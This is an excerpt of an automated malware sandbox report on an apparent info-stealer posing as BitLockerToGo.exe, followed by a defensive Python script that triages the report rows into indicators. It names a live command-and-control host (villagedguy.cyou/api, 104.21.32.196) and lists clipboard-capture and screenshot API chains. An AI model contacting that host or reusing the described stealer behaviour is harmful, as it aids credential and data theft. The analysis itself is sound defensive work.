              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 00000002.00000003.1924301094.0000000005090000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.microsof
Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000002.00000003.1924301094.000000000508E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000002.00000003.1924301094.000000000508E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/
Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/Y
Source: BitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2022709028.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1981900349.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010643755.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1996190492.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1922685655.0000000002CBA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2023090021.0000000002CBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2032771167.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2033135323.0000000002CBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/api
Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C7E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/api0
Source: BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/apiF9
Source: BitLockerToGo.exe, 00000002.00000003.2009812823.0000000002D19000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010533759.0000000002D1C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2010643755.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/apiO
Source: BitLockerToGo.exe, 00000002.00000003.2023090021.0000000002CBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/apiX
Source: BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2032771167.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/apibu
Source: BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/apibu0
Source: BitLockerToGo.exe, 00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/apig
Source: BitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/apiob
Source: BitLockerToGo.exe, 00000002.00000003.1996190492.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/apis
Source: BitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/api~Vl
Source: BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/ges
Source: BitLockerToGo.exe, 00000002.00000003.2033135323.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2029618149.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/h
Source: BitLockerToGo.exe, 00000002.00000003.1998002889.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1996190492.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou:443/api
Source: VBoxClient-x86.dll.0.dr, qsqlite.dll.0.dr, VBoxProxyStub-x86.dll.0.dr, Qt5GuiVBox.dll | String found in binary or memory: https://www.digicert.com/CPS0
Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: libidn2-0.dll.0.dr | String found in binary or memory: https://www.gnu.org/gethelp/
Source: libidn2-0.dll.0.dr | String found in binary or memory: https://www.gnu.org/gethelp/exebatcmdcom
Source: libiconv-2.dll.0.dr | String found in binary or memory: https://www.gnu.org/licenses/
Source: libidn2-0.dll.0.dr | String found in binary or memory: https://www.gnu.org/software/libidn/#libidn2
Source: libidn2-0.dll.0.dr | String found in binary or memory: https://www.gnu.org/software/libidn/#libidn2Libidn2General
Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: BitLockerToGo.exe, 00000002.00000003.1925016440.0000000005079000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000002.00000003.1953566080.000000000515D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: BitLockerToGo.exe, 00000002.00000003.1895036491.0000000002CF3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1909317979.0000000002D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: VBoxProxyStub-x86.dll.0.dr | String found in binary or memory: https://www.virtualbox.org/
Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00438A30 OpenClipboard, GetWindowLongW, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00438BF0 GetDC, GetSystemMetrics, GetSystemMetrics, GetSystemMetrics, GetCurrentObject, GetObjectW, DeleteObject, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt
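The rows above mix three kinds of evidence: URL strings carved from BitLockerToGo.exe's memory and from the dropped DLLs, the TLS sessions the sandbox observed, and two WinAPI call chains (clipboard read, screen capture). Most of the URLs (Steam, Mozilla, Google, reCAPTCHA, Office help) look like content the process read from local browser and application data rather than attacker infrastructure. The host that stands out is the one referenced from many distinct memory regions of process 2 and whose path carries varying trailing bytes (api, apibu0, api~Vl): that is what a null-terminated C2 URL looks like when the string carver takes the neighbouring heap bytes along with it. The script below is an added example, not Joe Sandbox code. It embeds a constructed subset of the rows, written as 'source | description' (that separator is this script's own convention), and derives the host-to-region counts, the common endpoint prefix per host, the TLS sessions per server endpoint, and the capabilities implied by each API chain. The capability table and the cutoff for what counts as a distinct region are assumptions of the example; the section does not state which hostname 104.21.32.196 served, and the script makes no such claim.

```python
"""Triage Joe Sandbox 'Source | description' rows into a short IOC summary.

Added example for this report, not Joe Sandbox code. Rows are written as
'source | description' (the separator is this script's own convention) and
only a small constructed subset of the report's rows is embedded so the
script runs offline.
"""
import os
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: a handful of rows copied from the report above.
SAMPLE_ROWS = """\
BitLockerToGo.exe, 00000002.00000003.1895132930.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
BitLockerToGo.exe, 00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2038770877.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/api
BitLockerToGo.exe, 00000002.00000002.2038989446.0000000002D1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou/apibu0
BitLockerToGo.exe, 00000002.00000003.1998002889.0000000002D2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://villagedguy.cyou:443/api
libidn2-0.dll.0.dr | String found in binary or memory: https://www.gnu.org/gethelp/
unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49734 version: TLS 1.2
unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49736 version: TLS 1.2
unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49738 version: TLS 1.2
C:\\Windows\\BitLockerDiscoveryVolumeContents\\BitLockerToGo.exe | Code function: 2_2_00438A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,
C:\\Windows\\BitLockerDiscoveryVolumeContents\\BitLockerToGo.exe | Code function: 2_2_00438BF0 GetDC,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,
"""

URL_RE = re.compile(r"https?://[^\s;]+")
DUMP_RE = re.compile(r"\S+\.sdmp")
TLS_RE = re.compile(r"HTTPS traffic detected: ([\d.]+):(\d+) -> [\d.]+:(\d+)")
FUNC_RE = re.compile(r"Code function: (\S+) (.*)")

# Assumed capability table: every API in the set must appear in the chain.
CAPABILITIES = {
    "clipboard read": {"OpenClipboard", "GetClipboardData", "CloseClipboard"},
    "screen capture": {"GetDC", "CreateCompatibleBitmap", "BitBlt"},
}


def parse_rows(text):
    """Return (source, description) pairs; lines without the separator are skipped."""
    rows = []
    for line in text.splitlines():
        if " | " not in line:
            continue
        source, desc = line.split(" | ", 1)
        rows.append((source.strip(), desc.strip()))
    return rows


def regions_of(source):
    """Memory dump ids named in the source cell, or the dropped-file name itself."""
    dumps = DUMP_RE.findall(source)
    return set(dumps) if dumps else {source}


def url_index(rows):
    """host -> {'regions': dump ids / files referencing it, 'paths': URL paths seen}."""
    index = defaultdict(lambda: {"regions": set(), "paths": set()})
    for source, desc in rows:
        if not desc.startswith("String found in binary or memory:"):
            continue
        for url in URL_RE.findall(desc):
            parts = urlsplit(url)          # .hostname drops the :443 and lowercases
            if not parts.hostname:
                continue
            index[parts.hostname]["regions"] |= regions_of(source)
            index[parts.hostname]["paths"].add(parts.path or "/")
    return dict(index)


def common_endpoint(paths):
    """Longest common path prefix, so '/api', '/apibu0', '/api' collapse to '/api'."""
    return os.path.commonprefix(sorted(paths))


def tls_endpoints(rows):
    """'server_ip:port' -> sorted client ports that connected to it."""
    endpoints = defaultdict(list)
    for _, desc in rows:
        m = TLS_RE.search(desc)
        if m:
            endpoints[f"{m.group(1)}:{m.group(2)}"].append(int(m.group(3)))
    return {server: sorted(ports) for server, ports in endpoints.items()}


def api_capabilities(rows):
    """function id -> capabilities whose full API set occurs in its call chain."""
    caps = {}
    for _, desc in rows:
        m = FUNC_RE.search(desc)
        if not m:
            continue
        apis = {a.strip() for a in m.group(2).split(",") if a.strip()}
        hits = [name for name, needed in CAPABILITIES.items() if needed <= apis]
        if hits:
            caps[m.group(1)] = hits
    return caps


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    by_regions = sorted(url_index(rows).items(), key=lambda kv: -len(kv[1]["regions"]))
    for host, entry in by_regions:
        print(f"{host:28} regions={len(entry['regions'])} endpoint={common_endpoint(entry['paths'])}")
    for server, ports in tls_endpoints(rows).items():
        print(f"{server:22} sessions={len(ports)} client_ports={ports}")
    for func, hits in api_capabilities(rows).items():
        print(f"{func} -> {', '.join(hits)}")
```

Run against the full row set, the same script ranks villagedguy.cyou first by region count and reduces its dozen path variants to the single /api endpoint, which is the indicator worth blocking; the Steam and Mozilla hosts each collapse to one or two regions from the browser-data dumps.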

System Summary

Source: 00000001.00000002.1881484672.000000000A7D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECF400C
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECDA8AC
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECE569C
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECEECE0
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECDDC4C
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECF09D8
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECE6294
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ED09008
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ED02F24
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECFC074
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECFBDF8
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECFFD18
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECDBF0C
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECDB318
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ED05510
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ED059E0
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECF400C
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECDE91C
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECDB948
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECD72AC
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECECA30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042D020
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004321CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004412F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040E280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043D530
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040F6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00411789
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004488A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043DAF2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00431C50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040FDCC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043DE1A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00447F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00442040
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00430068
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00408020
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004461C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040A1EE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043E180
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043C1B1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00407270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00448230
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004202C1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004012D5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00430280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041D2AD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042E343
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004293D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041F388
